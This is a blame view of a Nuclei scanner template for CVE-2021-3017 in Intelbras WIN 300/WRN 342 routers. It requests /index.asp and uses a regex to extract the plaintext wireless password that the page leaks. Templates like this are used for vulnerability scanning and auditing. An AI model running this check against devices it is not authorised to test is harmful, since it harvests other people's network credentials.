nuclei-templates/http/cves/2021/CVE-2021-3017.yaml

47 lines
1.2 KiB
YAML
Raw Normal View History

2021-08-14 06:32:59 +00:00
id: CVE-2021-3017
info:
name: Intelbras WIN 300/WRN 342 - Credentials Disclosure
2021-08-14 06:32:59 +00:00
author: pikpikcu
severity: high
description: Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code.
reference:
2021-08-14 08:28:04 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-3017
- https://pastebin.com/cTYTf0Yn
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-3017
2023-07-11 19:49:27 +00:00
epss-score: 0.0151
cpe: cpe:2.3:o:intelbras:win_300_firmware:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.85325
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: intelbras
product: win_300_firmware
tags: cve,cve2021,exposure,router
2021-08-14 06:32:59 +00:00
http:
2021-08-14 06:32:59 +00:00
- method: GET
path:
- "{{BaseURL}}/index.asp"
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-08-14 06:32:59 +00:00
words:
- 'def_wirelesspassword ='
2021-08-14 08:26:56 +00:00
- '<title>Roteador Wireless</title>'
2021-08-14 08:33:43 +00:00
condition: and
2021-08-14 06:32:59 +00:00
- type: status
status:
- 200
2021-08-14 08:26:56 +00:00
extractors:
- type: regex
regex:
- 'def_wirelesspassword = "([A-Za-z0-9=]+)";'
2023-07-11 19:49:27 +00:00
part: body